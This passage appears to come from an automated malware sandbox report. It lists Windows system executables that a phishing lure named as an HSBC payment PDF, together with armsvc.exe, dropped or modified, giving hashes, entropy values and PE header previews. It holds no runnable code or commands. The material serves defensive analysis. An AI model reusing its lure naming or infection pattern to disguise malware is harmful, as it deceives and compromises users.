                                                                                                                                                  SHA-512:6C0E1DDA9D8BB54F6B99C7606047EFE775B4910EEC59A92DE9CACBCC03186E9AC0474873A30A19014ED97FA1374C2EDC4243FC2417B62E9666FD7C47BE82E14C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:.(..@...@...........................................!...................................^^.\.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`............8.$!K..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.........^^.\................................................................8.B.^^.\....19041.1.amd64fre.vb_release.191206-1406.....,.@.^^.\...............'"a.-....spp.pdb...........@.^^.\.....T.c..i.\.C.s"8@....vssvc.pdb......./.@.^^.\....W.p.D.......]....vssapi.pdb......-.@.^^.\.....\..Q....T*&.......udfs.pdb........0.@.^^.\......B..,`..9..4.....ifsutil.pdb.....-.@.^^.\....I:...S%9.`...'.R....uudf.pdb........1.@.^^.\...........1$OI"......wbengine.pdb................................

                                                                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\9624e934681120d9.bin

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12320
                                                                                                                                                  Entropy (8bit):7.984867530157717
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:s7SrIK/rP8Em1BjabHOXhnhBe2YKGv/gagzLqB2UCVuHNJIhx4ws4QDlJaH2q2/h:s7pWSNdhsKGFgHqE6IYwzQvaH2q8nlQk
                                                                                                                                                  MD5:C5FDA9C7484A31EEE58179AC234421CA
                                                                                                                                                  SHA1:C9222569B9C16DE38B3830DFB0AC73F2D6621CB6
                                                                                                                                                  SHA-256:3343DCA704483582FD64B490FA13CF4AD0044E39D0319C098E9C027A8227C919
                                                                                                                                                  SHA-512:CF6C5ED3B7F9E093D6F79542B5A31B2486E76F2FBCF1844BD61E72B9E07E8F8A0FFE96E4042F19123EFD790DA4685695715785BC235BC8F90550E934FE113A9E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:e..~L...%..qJ.Y..D5.........4.:.7....v..b...LZ..|.T........z5....zL.3W.F".4t.%!.;.r..\%.E$.73.q..C..b.abNE.%Zl.......l9..lx..?)m..y..k...+.....z:X.U..........^..?...\..+.b'.V.......3.G.i..}.>.1.R.X...@..0]...fw...KV.bT.+dh.5..W.....#...q..R@..\..^..*..<.B).h......E..G...y0G...Y.Z..t.K..:.|\.;.[..m.~$...."..!0.cV..P.....B-F.w8.}..I....c....8......`..n..p..m":qW.h..vh.Z............ePQ...a,.S.L]o. =-...J.*...0;.]."k95......p.4b.W..RR.+.....p..g=.zl..b.a.}.w...m..a..m..E.<.e..VoFt.=.39m..+..c.6.NOm.<.G.iJ...k..-...X..s2......n...a.9(.?x..@...6L.[.m.......?E....q.x...B....{......#....b#..|.....`.Y....L.?;....J,rn.,4-.W.~..{...P.....t.......=s...].Sxv......Q..YXb...u.\&.C..Xll.......>...l6.J..-...S.8.....Bs`:...W..Dq..X....5<.t.....f...Q5j........j..A.7.._.?...q.....R.%..D/.<.6..F..."XK:6{Z.4)..ib.`R....U...0o~.U.&@{.......^.3.}.H. M.tQ0...#..... um.?...-...E.#.......c".@.7..:?)..P..Gy.].2..&..j{q...Eo8$h..N/. l..;YW_...8wI.lu......$-j...*e..V..6.3.

                                                                                                                                                  C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1306624
                                                                                                                                                  Entropy (8bit):4.538230049854179
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:HiiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Hk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:436D2153822038C49A041E9D657F7E2D
                                                                                                                                                  SHA1:97A8FC3379B41652D740154770F5B6C2EEB178DD
                                                                                                                                                  SHA-256:E0ABB4330A8422589222DD99DC007FA17413209DBAB4D4C55096BAE2449275B2
                                                                                                                                                  SHA-512:6B035ECE3C0C2127D9319F5EE6218B5DBAEC0E010C3D5857B68E0B1F743C8C66ABACC008EC43BECFD55C6A107E7DB11E891897BF55E6C07F77B1FED1515E9F45
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................O............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...`...........P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\AgentService.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):6.967204885640469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:qwVFr68Vw9wn/6h8p1zid5LNiXicJFFRGNzj3:qwVFrssCnd57wRGpj3
                                                                                                                                                  MD5:7CFA6C3EAA73B924E9F391CE7ED6CFFF
                                                                                                                                                  SHA1:EC2C1DA21CFF35AA4B44164506F3E34721A91825
                                                                                                                                                  SHA-256:DB3A2DCE6A8B4A35C40AB56BD0CF7DFB12F28CF4D80DAF03DEA23283BF834D73
                                                                                                                                                  SHA-512:1C210E123F537377C08D73A00D2AC26819D745022938CD614CDF68F94E95CBB841187CF0289C5F73512BD742FB4C1196F272663C8D786CB0CE6863EF4A026561
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@....................................K..... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\AppVClient.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):1348608
                                                                                                                                                  Entropy (8bit):7.243439755764336
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:vQW4qoNUgslKNX0Ip0MgHCp+MBOuU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vQW9BKNX0IPgi8MBOuULNiXicJFFRGNf
                                                                                                                                                  MD5:6CEADD1DB47FACFB65E07258640DCDB8
                                                                                                                                                  SHA1:38EEC9A3A708CCBB3C9289EF366D1906CD32244E
                                                                                                                                                  SHA-256:5B2505BF31483499DBF55F976DC91EC8D4405778D19A32130219D6B46D25BEB4
                                                                                                                                                  SHA-512:06B818E80A3ACB10F6212DF7E08CBD70E4CDBF38AF944DAB70E136E08FB94CFD316722520366D0E088136A8DC8B92ABB0E141FD63F4EF416A0535A41E9542004
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1379840
                                                                                                                                                  Entropy (8bit):4.681777172476258
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:O2G7AbHjkb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:O2G7AbHjSLNiXicJFFRGNzj3
                                                                                                                                                  MD5:82FD3B21343E884A947B12624BA14B65
                                                                                                                                                  SHA1:74EBD890D183F123679279E16241572BFB02B61B
                                                                                                                                                  SHA-256:B09288552C6F85EF1EC5198A1E3C07C10957662877520651B2E8BA26E94C1D67
                                                                                                                                                  SHA-512:19449541F0FBFC6777AF7C1FCA50964D4263384EFD2B0139626249B96FB8C5C2C71DA04B83AD91B01BD7014A6B5FF6B8A4AB723FE8686F58AA914AD7C047F338
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. ......J.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\FXSSVC.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1242624
                                                                                                                                                  Entropy (8bit):7.280266378624991
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:HkdpSI+K3S/GWei+qNv2wG3D/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:H6SIGGWei2wG3DLNiXicJFFRGNzj3
                                                                                                                                                  MD5:5DA3CAFF7B6DB6ED124E5F9690E7B126
                                                                                                                                                  SHA1:B2ED8B3ED656B5E5FDA051F415DA1EE5CB60D28F
                                                                                                                                                  SHA-256:0FECD3AB32F7AB8DE77889D2C7B4243B0ADD925045DB2684FE9A75F8982EB8F4
                                                                                                                                                  SHA-512:7A72A77C766188F7BBEFC407A75B4839C50A48136B97902613CC5A4D470260052D28AC2CCF729122EAC4BBD87A43430DE0BBE4ABBCAF7FCB8CE43CD7E4C54B50
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......B..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\Locator.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1296896
                                                                                                                                                  Entropy (8bit):4.515613987304856
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:z2iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:zA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:E30FA2BCFDF4D20217D89B9395BE104F
                                                                                                                                                  SHA1:B84D3B169EE6940277DA26AECF14CEEB6F00BFB7
                                                                                                                                                  SHA-256:CA0EA622049BCDDF47C480A5F39078C5CB3147E505B9211BD09BCBA9E1B10110
                                                                                                                                                  SHA-512:417832139A248E384882519532AB9679CAA8FA501B1153B32F7C5C10B1D6CAE1FE3A183E7B8FDE4AA5AACAEF6CBBD1D807A069EB0BE27DADCF989F21A8923FFC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@....................................@^.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...`...`.......*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16384
                                                                                                                                                  Entropy (8bit):0.32139010536246265
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gbyXD8ta/k/uMclF6vMclFq5zr7rsz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+G0Xl:bXD80kqF69Fq5zrx6CzE5Z2+fqjFHXl
                                                                                                                                                  MD5:5D3F09112DD1D5BAF458881226B49FF4
                                                                                                                                                  SHA1:50FD83C90BAC19209765DCA1899FBC473AED773E
                                                                                                                                                  SHA-256:701446DD9576AB8EF558C7424DF4FF1AA3A8AE4E154FE13D0430348A28413BD0
                                                                                                                                                  SHA-512:E9591B890CC25E757FBD0172A0C78469B611652E2F975A3028B35FF4DDEB3CB5BAD04EB1F66AEAD12092F60CF9B808F4F5885D85D5F8295F2121D0A7FE12D0B5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:.@..X...X.......................................X...!...................................e.!S.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`.............X..K..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.........e.!S............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1667072
                                                                                                                                                  Entropy (8bit):4.8231786068713625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uAL3UTL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:uAL3UnLNiXicJFFRGNzj3
                                                                                                                                                  MD5:56CCD164B03367A0F39A8360E82CB3D1
                                                                                                                                                  SHA1:472F38AAD6B2965A0867A65566DCFE2B8609A76A
                                                                                                                                                  SHA-256:873747021FB8E28F0F2DAA7A055C46BEC243A81E337AC1550E6FA45E6D8BF570
                                                                                                                                                  SHA-512:1221BD8637F11C11DB00593B9D25BC79081883364968FC5F68DAD361F42E9DD66FE193E471DF772A23006E8D1676C1D659BC3A71B02E53473C90201A302AAA2F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................%.....CP.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...`...0......................@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1391616
                                                                                                                                                  Entropy (8bit):4.703252925773147
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:KOH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KOHLNiXicJFFRGNzj3
                                                                                                                                                  MD5:55154595EBC76876D16839386F302C81
                                                                                                                                                  SHA1:9FBE9DA2C91E79D49AB4BF750722F9EBD0C325A8
                                                                                                                                                  SHA-256:F6F6C3AEA0C463F77AA197FEAAFDB43C51B87BF5519C2CD8181A681EC85B10D5
                                                                                                                                                  SHA-512:A1A6AA7180335A44DB7C0ACDEF399BC46BF7A4063DC0BCCCBE34B90D3C27E4297E6864E03DE5D1FEE7263E9D10ABD4618EB728AF0448B81B340711BE12581CB0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@............................. .....`H.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1513984
                                                                                                                                                  Entropy (8bit):7.094193200650157
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Q3frCoQ9tLsiLPLe24CxruW4bIhllL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Q3fIsIPLkCNuVbIhDLLNiXicJFFRGNzb
                                                                                                                                                  MD5:DBC131B4C06BA48B2F21338953515BB3
                                                                                                                                                  SHA1:95FC8894DE2C361EFD0749D5A6D6A2C8BC8B60FC
                                                                                                                                                  SHA-256:5405008D2E960735F7A83216BFAAF3EBA4DA954D0B082D7BDEE922F1DE1A0450
                                                                                                                                                  SHA-512:EED4E61D0F2B656AAF53BFAFC361F8CB0134BEF0F25D6C78AFBC558D9E74315482BE12FA9DCF7378A29A8B6C9442EDADAB0109B3D6D6080E16881B9EC6C16CB2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\SensorDataService.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1846784
                                                                                                                                                  Entropy (8bit):6.932723041634829
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:yF2YuHNETovAvNYf8km0LNiXicJFFRGNzj3:76BCf8kH7wRGpj3
                                                                                                                                                  MD5:138460F80D6D680988322149C0DA8337
                                                                                                                                                  SHA1:A49ECB4125467526F003F2603A7C64B756991066
                                                                                                                                                  SHA-256:470A8AA885F76ED252C8780883B9400ECC26450955754A02035FFEC93D454A81
                                                                                                                                                  SHA-512:BD7707DB9E310052923F068209C9DEAEBE03C4E145E9AFDCBD4B93B7DEE8027D23B5E0B6D687613DCA387696FA0FB6B7AD65E79A4FD01AF7C216DACE4FB90B28
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p............ .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\Spectrum.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1455616
                                                                                                                                                  Entropy (8bit):7.230996176888668
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:1iW6ZvAKF5i/dN9Bde9j9Trk+FH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1YxF50b9Bdu9TxhLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A5C5CBD638C50F62E6B1C909D40EA394
                                                                                                                                                  SHA1:035C648D6B299E434AFFCBD42BA03525989AAC1B
                                                                                                                                                  SHA-256:A792CDCC53ACCC9F38E1699F293CBE4678523720351E32A89CB75827090E33A9
                                                                                                                                                  SHA-512:46F3629EB5D1E7E1905818BE8D0D78022083C5319069A18E37ACC066A730D34A5C4B274BCA06B446AA1E9E5AFE69356F5F2A4D11657461DDBCD6DDBE12F39AB0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................v.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1611264
                                                                                                                                                  Entropy (8bit):5.048868878670084
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:xJnJ5D3WXe/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xJnJ5DGXeLNiXicJFFRGNzj3
                                                                                                                                                  MD5:978A54C9D759FF632658D6B5D6F278B3
                                                                                                                                                  SHA1:4AB50C048C98C90EE9C55BA7871C00712A19F3E0
                                                                                                                                                  SHA-256:457357CA06F1A07A060D09847D642AE7F774D8DF2781B66AAECEF5C297453DD4
                                                                                                                                                  SHA-512:0BA290E087350101E2DE9A1039C8DFBD8A38E996A9591B04E6ADD230417EB6597B7261765DE1C09C709EB07C97DDBBB81BD5CE933691DA051E2BAD541389A9AB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@..............................#........... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...`...0......................@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\VSSVC.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2075136
                                                                                                                                                  Entropy (8bit):6.729895383765107
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:zPK8mJYTerDjfJ2313e1mP1MdnUtLNiXicJFFRGNzj3:p7wRGpj3
                                                                                                                                                  MD5:AAE3D9BE8A47852DE9975AD94447C6D8
                                                                                                                                                  SHA1:47C6E13A2E122245EDE5D06A97A0F5FD7E03F47B
                                                                                                                                                  SHA-256:4EEB25B011BDE7D241AF1C9E3FFDE975FF52C7679359EE9F83DABED53E6B4D3B
                                                                                                                                                  SHA-512:D926EE9B41BC05EBCBF5B2E312280DCB6B0CEEDD94ED4DDEC9BA5A08070733D36FA5BFD659DBD6A885066D01500BF2B4625020ED229F3ABF4E2A9F43FF3D0D8B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ........... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\alg.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1381376
                                                                                                                                                  Entropy (8bit):4.682163561003341
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:3ne/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3neLNiXicJFFRGNzj3
                                                                                                                                                  MD5:463F7F1E3383EFC2DF1C247DF13BE675
                                                                                                                                                  SHA1:E7C88695BD28C64916BE2BD7851CED3FD372EFA0
                                                                                                                                                  SHA-256:FDA1EF5B43C2AD181E75740138C935C9BB9CFCD13E63ADA3689F608B25F384A0
                                                                                                                                                  SHA-512:571A9949B079ACAB0C4BDAC158612CE6017016D1587E45F92F4B3FBFCDB7D5EE63BE4F48CA207B211D0D5527A4B731879886A64742C3E783968658156BD4CF83
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. ..... M.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\msdtc.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1434112
                                                                                                                                                  Entropy (8bit):4.680799420679136
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:9IyR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9IOLNiXicJFFRGNzj3
                                                                                                                                                  MD5:51874DD725C538D547DFE65FED3A93E2
                                                                                                                                                  SHA1:91EECFC76DBF59017C4514A5DD936343DB74C104
